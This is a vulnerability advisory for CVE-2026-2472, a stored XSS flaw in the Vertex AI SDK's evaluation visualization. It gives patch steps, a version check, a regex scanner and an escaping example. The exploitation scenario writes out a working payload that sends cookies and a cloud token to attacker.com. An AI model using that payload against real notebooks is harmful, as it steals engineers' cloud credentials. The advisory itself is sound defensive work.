If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.
Risk Assessment
High business impact despite low EPSS (0.00064) and no CISA KEV inclusion. Jupyter and Colab environments are disproportionately dangerous XSS targets: they routinely hold Google Cloud OAuth tokens, service account keys, and direct access to production data pipelines and model artifacts. The attack requires no authentication—only the ability to influence evaluation dataset content or model outputs, which is achievable via adversarial prompts, poisoned datasets, or indirect prompt injection into evaluated models. A public PoC (github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud) lowers the exploitation bar further. No confirmed active exploitation in the wild as of analysis date.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| google-cloud-aiplatform | pip | >= 1.98.0, < 1.131.0 | 1.131.0 |
If you use google-cloud-aiplatform anywhere in the range above (>= 1.98.0, < 1.131.0), you're affected.
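A quick way to check an environment against the affected range is a version probe; this is a minimal sketch that assumes plain X.Y.Z version strings (pre-release suffixes would need the `packaging` library):

```python
from importlib import metadata

def is_vulnerable(version: str) -> bool:
    """True if version falls in the affected range >= 1.98.0, < 1.131.0."""
    # Assumes a plain X.Y.Z version string; use packaging.version for
    # pre-release or non-numeric suffixes.
    parts = tuple(int(p) for p in version.split(".")[:3])
    return (1, 98, 0) <= parts < (1, 131, 0)

try:
    installed = metadata.version("google-cloud-aiplatform")
    status = "VULNERABLE: upgrade to 1.131.0" if is_vulnerable(installed) else "ok"
    print(f"google-cloud-aiplatform {installed}: {status}")
except metadata.PackageNotFoundError:
    print("google-cloud-aiplatform is not installed")
```

The same check can be dropped into a CI step to fail builds that pin a vulnerable version.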
Recommended Action
Six steps:
1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 with `pip install --upgrade google-cloud-aiplatform`; verify with `pip show google-cloud-aiplatform`.
2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
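The detection step above can be sketched as a recursive scan over parsed evaluation JSON. This is a heuristic pre-filter using the patterns named in step 3 (script tags, inline event handlers, javascript: URIs), not a substitute for proper output sanitization:

```python
import json
import re

# Heuristic patterns from the detection step; a pre-filter, not a sanitizer.
SUSPICIOUS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"\bon(?:error|load|click)\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
]

def flag_suspicious_strings(obj, path="$"):
    """Recursively walk parsed JSON; yield (path, value) for risky strings."""
    if isinstance(obj, str):
        if any(p.search(obj) for p in SUSPICIOUS):
            yield path, obj
    elif isinstance(obj, dict):
        for key, value in obj.items():
            yield from flag_suspicious_strings(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from flag_suspicious_strings(value, f"{path}[{i}]")

sample = json.loads('{"output": "<img src=x onerror=alert(1)>"}')
hits = list(flag_suspicious_strings(sample))
```

Attackers can evade simple regexes (encoded entities, exotic event handlers), so treat any hit as a reason to quarantine the dataset, not the absence of hits as proof of safety.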
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2026-2472?
CVE-2026-2472 is a stored cross-site scripting (XSS) vulnerability in the _genai/_evals_visualization component of the Google Cloud Vertex AI SDK (google-cloud-aiplatform), affecting versions 1.98.0 up to but not including 1.131.0. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in an engineer's Jupyter or Colab browser session, enabling cloud credential theft and account takeover.
Is CVE-2026-2472 actively exploited?
No confirmed active exploitation of CVE-2026-2472 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-2472?
1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 with `pip install --upgrade google-cloud-aiplatform`; verify with `pip show google-cloud-aiplatform`.
2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
What systems are affected by CVE-2026-2472?
This vulnerability affects the following AI/ML architecture patterns: model evaluation pipelines, AI development workspaces, Vertex AI workflows, Jupyter and Colab ML environments, LLM evaluation frameworks, automated ML pipelines with visualization.
What is the CVSS score for CVE-2026-2472?
No CVSS score has been assigned yet.
Technical Details
NVD Description
Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.
Exploitation Scenario
An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
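The scenario only works because the visualization embeds dataset strings in HTML unescaped. As a minimal illustration of why escaping defeats it (using stdlib `html.escape`, not the SDK's actual fix):

```python
import html

# Illustrative payload modeled on the scenario above; escaping turns the
# markup into inert text, so the browser never creates the <img> element
# and the onerror handler never fires.
payload = '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie))>'
safe = html.escape(payload)  # "<" -> "&lt;", '"' -> "&quot;", etc.
```

This is the general fix for stored XSS: encode untrusted data for the HTML context at render time rather than trying to filter "bad" inputs.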
Weaknesses (CWE)
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
References
- docs.cloud.google.com/support/bulletins
- github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud
- github.com/advisories/GHSA-qv8j-hgpc-vrq8
- github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480
- github.com/googleapis/python-aiplatform/releases/tag/v1.131.0
- nvd.nist.gov/vuln/detail/CVE-2026-2472
Related Vulnerabilities
- CVE-2023-3765 (CVSS 10.0): MLflow: path traversal allows arbitrary file read (same attack type: Supply Chain)
- CVE-2025-5120 (CVSS 10.0): smolagents: sandbox escape enables unauthenticated RCE (same attack type: Supply Chain)
- CVE-2025-2828 (CVSS 10.0): LangChain RequestsToolkit: SSRF exposes cloud metadata (same attack type: Data Extraction)
- CVE-2025-53767 (CVSS 10.0): Azure OpenAI: SSRF EoP, no auth required (same attack type: Data Extraction)
- CVE-2025-59528 (CVSS 10.0): Flowise: Unauthenticated RCE via MCP config injection (same attack type: Supply Chain)